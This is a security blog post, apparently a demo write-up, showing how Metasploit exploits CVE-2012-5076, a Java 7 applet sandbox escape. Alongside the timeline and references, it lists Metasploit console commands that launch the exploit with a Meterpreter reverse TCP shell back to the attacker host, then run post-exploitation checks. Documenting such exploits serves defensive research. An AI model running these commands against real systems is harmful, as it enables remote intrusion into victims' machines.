aka wow on ZATAZ.com
CVE-2012-5076 Java Applet AverageRangeStatisticImpl RCE Metasploit Demo
Timeline :
Vulnerability patched by Oracle in 2012 October CPU
Vulnerability discovered exploited in the wild by kafeine the 2012-11-09
First Metasploit PoC provided the 2012-11-11
Second Metasploit PoC provided the 2013-01-22
PoC provided by :
Unknown
juan vazquez
Reference(s) :
CVE-2012-5076
OSVDB-86363
BID-56054
Cool EK : “Hello my friend…”
Oracle October 2012 CPU
New Java Modules in Metasploit… No 0 days this time
Affected version(s) :
Oracle Java version 7 Update 7 and earlier.
Tested on Windows 8 Pro with :
Internet Explorer 10
Oracle Java 7 Update 7
Description :
This module abuses the AverageRangeStatisticImpl from a Java Applet to run arbitrary Java code outside of the sandbox, a different exploit vector than the one exploited in the wild in November of 2012. The vulnerability affects Java version 7u7 and earlier.
Commands :
use exploit/multi/browser/java_jre17_glassfish_averagerangestatisticimpl set SRVHOST 192.168.178.26 set TARGET 1 set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.178.26 exploit getuid sysinfo
I recommend you to read these related posts
- Bye Bye Java SE 6, Security Enhancements in Java SE 7U10
- CVE-2012-5088 Java Applet Method Handle RCE Metasploit Demo
- CVE-2013-2423 – Java 7u17 Applet Reflection Type Confusion RCE Metasploit Demo
- Oracle Java Critical Patch Update February 2013 Review
- Oracle Java Critical Patch Update April 2013 Review
- CVE-2012-5076 Java Applet JAX-WS Remote Code Execution Metasploit Demo
- KaiXin Exploit Kit Evolutions
- Gong Da Exploit Kit Add Java CVE-2013-1493 & IE CVE-2012-4792 & IE CVE-2012-4969 Support
- Oracle Java Critical Patch Update February 2013 – Special Update Review
- CVE-2013-0431 Java Applet JMX Remote Code Execution Metasploit Demo
Logging In...
Leave a Reply Cancel reply
Last reply was 3 months ago
[...] Java Applet Method Handle Remote Code Execution, and exploits CVE 2012-5088 Eric Romang has a pair of [...]